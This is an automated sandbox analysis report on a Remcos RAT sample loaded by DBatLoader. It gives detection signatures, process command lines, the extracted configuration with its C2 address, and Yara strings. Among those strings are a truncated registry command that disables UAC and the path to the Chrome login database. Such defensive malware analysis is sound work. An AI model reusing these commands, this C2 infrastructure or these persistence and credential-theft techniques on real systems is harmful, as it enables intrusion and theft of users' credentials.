Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SHEOrder-10524.exe

Overview

General Information

Sample name:SHEOrder-10524.exe
Analysis ID:1431184
MD5:439f6db2adb770a0f825879c91da9904
SHA1:6b997f099e01ba06378a58115f65d515a22f5fb1
SHA256:9eef226fdb7d6c554cd552fc3f597ebfd6d77e33b95db53f7a631a75acf0c270
Tags:exeHUN
Infos:

Detection

Remcos, DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Drops PE files with a suspicious file extension
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SHEOrder-10524.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\SHEOrder-10524.exe" MD5: 439F6DB2ADB770A0F825879C91DA9904)
    • cmd.exe (PID: 7368 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\WagotghlO.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 7416 cmdline: C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\SHEOrder-10524.exe C:\\Users\\Public\\Libraries\\Wagotghl.PIF MD5: 9472AAB6390E4F1431BAA912FCFF9707)
    • lhgtogaW.pif (PID: 7432 cmdline: C:\Users\Public\Libraries\lhgtogaW.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • lhgtogaW.pif (PID: 7548 cmdline: C:\Users\Public\Libraries\lhgtogaW.pif /stext "C:\Users\user\AppData\Local\Temp\zhrdpmieysz" MD5: C116D3604CEAFE7057D77FF27552C215)
      • lhgtogaW.pif (PID: 7556 cmdline: C:\Users\Public\Libraries\lhgtogaW.pif /stext "C:\Users\user\AppData\Local\Temp\kbfnqftxmarjte" MD5: C116D3604CEAFE7057D77FF27552C215)
      • lhgtogaW.pif (PID: 7576 cmdline: C:\Users\Public\Libraries\lhgtogaW.pif /stext "C:\Users\user\AppData\Local\Temp\mekgrxezaijovlxyi" MD5: C116D3604CEAFE7057D77FF27552C215)
  • Wagotghl.PIF (PID: 7636 cmdline: "C:\Users\Public\Libraries\Wagotghl.PIF" MD5: 439F6DB2ADB770A0F825879C91DA9904)
    • lhgtogaW.pif (PID: 7868 cmdline: C:\Users\Public\Libraries\lhgtogaW.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • Wagotghl.PIF (PID: 7916 cmdline: "C:\Users\Public\Libraries\Wagotghl.PIF" MD5: 439F6DB2ADB770A0F825879C91DA9904)
    • lhgtogaW.pif (PID: 8068 cmdline: C:\Users\Public\Libraries\lhgtogaW.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: Remcos

{"Version": "4.9.4 Pro", "Host:Port:Password": "91.223.3.151:4508", "Assigned name": "HCODE FILE", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-V052BG", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    C:\Users\Public\Libraries\WagotghlO.batMALWARE_BAT_KoadicBATKoadic post-exploitation framework BAT payloadditekSHen
    • 0x2:$s1: &@cls&@set
    • 0x5b:$s2: :~41,1%%
    • 0x67:$s2: :~47,1%%
    • 0x73:$s2: :~6,1%%
    • 0x7e:$s2: :~53,1%%
    • 0x8a:$s2: :~1,1%
    • 0x9b:$s2: :~10,1%%
    • 0xa7:$s2: :~39,1%%
    • 0xb3:$s2: :~16,1%%
    • 0xbf:$s2: :~13,1%%
    • 0xcb:$s2: :~25,1%%
    • 0xd7:$s2: :~53,1%%
    • 0xe3:$s2: :~42,1%%
    • 0xef:$s2: :~22,1%%
    • 0xfb:$s2: :~18,1%%
    • 0x107:$s2: :~48,1%%
    • 0x113:$s2: :~51,1%%
    • 0x11f:$s2: :~2,1%%
    • 0x12a:$s2: :~61,1%%
    • 0x136:$s2: :~9,1%%
    • 0x141:$s2: :~19,1%%

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.4155660149.000000002416C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000A.00000001.1882448821.0000000000490000.00000040.00000001.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000A.00000001.1882448821.0000000000490000.00000040.00000001.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          0000000A.00000001.1882448821.0000000000490000.00000040.00000001.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x6aab0:$a1: Remcos restarted by watchdog!
          • 0x6b028:$a3: %02i:%02i:%02i:%03i
          00000000.00000003.1717116451.000000007E700000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            Click to see the 71 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.SHEOrder-10524.exe.28c0000.0.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
              4.2.lhgtogaW.pif.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                4.2.lhgtogaW.pif.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  4.2.lhgtogaW.pif.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x6c4a8:$a1: Remcos restarted by watchdog!
                  • 0x6ca20:$a3: %02i:%02i:%02i:%03i
                  4.2.lhgtogaW.pif.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                  • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
                  • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                  • 0x6656c:$str_b2: Executing file:
                  • 0x675ec:$str_b3: GetDirectListeningPort
                  • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                  • 0x67118:$str_b7: \update.vbs
                  • 0x66594:$str_b9: Downloaded file:
                  • 0x66580:$str_b10: Downloading file:
                  • 0x66624:$str_b12: Failed to upload file:
                  • 0x675b4:$str_b13: StartForward
                  • 0x675d4:$str_b14: StopForward
                  • 0x67070:$str_b15: fso.DeleteFile "
                  • 0x67004:$str_b16: On Error Resume Next
                  • 0x670a0:$str_b17: fso.DeleteFolder "
                  • 0x66614:$str_b18: Uploaded file:
                  • 0x665d4:$str_b19: Unable to delete:
                  • 0x67038:$str_b20: while fso.FileExists("
                  • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
                  Click to see the 36 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Execution from Suspicious Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\lhgtogaW.pif, CommandLine: C:\Users\Public\Libraries\lhgtogaW.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\lhgtogaW.pif, NewProcessName: C:\Users\Public\Libraries\lhgtogaW.pif, OriginalFileName: C:\Users\Public\Libraries\lhgtogaW.pif, ParentCommandLine: "C:\Users\user\Desktop\SHEOrder-10524.exe", ParentImage: C:\Users\user\Desktop\SHEOrder-10524.exe, ParentProcessId: 7276, ParentProcessName: SHEOrder-10524.exe, ProcessCommandLine: C:\Users\Public\Libraries\lhgtogaW.pif, ProcessId: 7432, ProcessName: lhgtogaW.pif
                  Sigma detected: New RUN Key Pointing to Suspicious Folder
                  Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Wagotghl.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SHEOrder-10524.exe, ProcessId: 7276, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wagotghl
                  Sigma detected: Suspicious Program Location with Network Connections
                  Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 91.223.3.151, DestinationIsIpv6: false, DestinationPort: 4508, EventID: 3, Image: C:\Users\Public\Libraries\lhgtogaW.pif, Initiated: true, ProcessId: 7432, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49733
                  Sigma detected: CurrentVersion Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Wagotghl.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SHEOrder-10524.exe, ProcessId: 7276, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wagotghl
                  Sigma detected: Execution of Suspicious File Type Extension
                  Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\lhgtogaW.pif, CommandLine: C:\Users\Public\Libraries\lhgtogaW.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\lhgtogaW.pif, NewProcessName: C:\Users\Public\Libraries\lhgtogaW.pif, OriginalFileName: C:\Users\Public\Libraries\lhgtogaW.pif, ParentCommandLine: "C:\Users\user\Desktop\SHEOrder-10524.exe", ParentImage: C:\Users\user\Desktop\SHEOrder-10524.exe, ParentProcessId: 7276, ParentProcessName: SHEOrder-10524.exe, ProcessCommandLine: C:\Users\Public\Libraries\lhgtogaW.pif, ProcessId: 7432, ProcessName: lhgtogaW.pif

                  Stealing of Sensitive Information

                  barindex
                  Sigma detected: Remcos
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\Public\Libraries\lhgtogaW.pif, ProcessId: 7432, TargetFilename: C:\ProgramData\remcos\logs.dat

                  Snort Signatures

                  No Snort rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: http://geoplugin.net/json.gp/CURL Reputation: Label: phishing
                  Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
                  Found malware configuration
                  Source: 14.1.lhgtogaW.pif.400000.3.unpackMalware Configuration Extractor: Remcos {"Version": "4.9.4 Pro", "Host:Port:Password": "91.223.3.151:4508", "Assigned name": "HCODE FILE", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-V052BG", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFReversingLabs: Detection: 47%
                  Source: C:\Users\Public\Libraries\netutils.dllReversingLabs: Detection: 28%
                  Multi AV Scanner detection for submitted file
                  Source: SHEOrder-10524.exeReversingLabs: Detection: 47%
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 4.2.lhgtogaW.pif.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.lhgtogaW.pif.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.4155660149.000000002416C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000001.1882448821.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.1717116451.000000007E700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000001.1717466391.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4156653259.0000000025BBF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000001.1938580336.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4137990797.0000000000490000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000001.1938580336.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4155660149.000000002412E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1733060343.000000007E790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000001.1882448821.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000001.1938580336.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.1775014710.0000000024164000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4137990797.0000000000AC0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000001.1717466391.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000001.1882448821.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: SHEOrder-10524.exe PID: 7276, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: lhgtogaW.pif PID: 7432, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: lhgtogaW.pif PID: 7868, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: lhgtogaW.pif PID: 8068, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Machine Learning detection for dropped file
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: SHEOrder-10524.exeJoe Sandbox ML: detected
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,4_2_00433837
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,4_1_00433837
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,5_2_00404423
                  Source: SHEOrder-10524.exe, 00000000.00000003.1717116451.000000007E700000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_79de4548-8

                  Exploits

                  barindex
                  Yara detected UAC Bypass using CMSTP
                  Source: Yara matchFile source: 4.2.lhgtogaW.pif.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.lhgtogaW.pif.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000001.1882448821.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.1717116451.000000007E700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000001.1717466391.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000001.1938580336.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4137990797.0000000000490000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000001.1938580336.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1733060343.000000007E790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000001.1882448821.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000001.1938580336.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4137990797.0000000000AC0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000001.1717466391.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000001.1882448821.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: SHEOrder-10524.exe PID: 7276, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: lhgtogaW.pif PID: 7432, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: lhgtogaW.pif PID: 7868, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: lhgtogaW.pif PID: 8068, type: MEMORYSTR

                  Privilege Escalation

                  barindex
                  Contains functionality to bypass UAC (CMSTPLUA)
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_004074FD _wcslen,CoGetObject,4_2_004074FD
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_004074FD _wcslen,CoGetObject,4_1_004074FD

                  Compliance

                  barindex
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifUnpacked PE file: 4.2.lhgtogaW.pif.400000.0.unpack
                  Source: SHEOrder-10524.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                  Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49737 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49745 version: TLS 1.2
                  Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdb source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, easinvoker.exe.0.dr
                  Source: Binary string: easinvoker.pdbH source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1732244936.0000000014BF0000.00000004.00000020.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, easinvoker.exe.0.dr
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028C58CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_028C58CC
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_00409253
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,4_2_0041C291
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,4_2_0040C34D
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_00409665
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,4_2_0040880C
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0040783C FindFirstFileW,FindNextFileW,4_2_0040783C
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,4_2_00419AF5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,4_2_0040BB30
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,4_2_0040BD37
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_274C10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_274C10F1
